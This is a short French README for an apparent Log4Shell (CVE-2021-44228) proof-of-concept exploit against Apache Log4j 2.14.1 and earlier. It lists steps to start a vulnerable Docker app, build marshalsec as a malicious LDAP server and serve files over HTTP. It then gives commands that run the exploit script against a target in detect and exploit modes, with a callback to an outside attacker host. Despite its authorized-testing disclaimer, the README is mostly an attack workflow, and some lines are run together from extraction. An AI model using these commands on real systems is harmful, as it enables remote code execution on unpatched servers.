
Log4Shell CVE-2021-44228 PoC
(CVE-2021-44228)
Exploit de test pour la vulnérabilité critique Log4Shell dans Apache Log4j ≤ 2.14.1, permettant l'exécution de code à distance via des injections JNDI.
⚠️ Ce PoC est uniquement destiné à des fins éducatives et à des tests contrôlés dans des environnements autorisés. Ne l'utilisez pas contre des systèmes sans autorisation explicite.
marshalsec (pour le serveur LDAP malveillant)python3 -m http.server)Exécutez l'application vulnérable :
docker run -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app
Accédez à : http://localhost:8080
git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
mvn clean package -DskipTests
python3 main.py -u http://target.com -i burp.collab.net -m detect
python3 main.py -u http://target.com -i 192.168.0.100:1389 -m exploit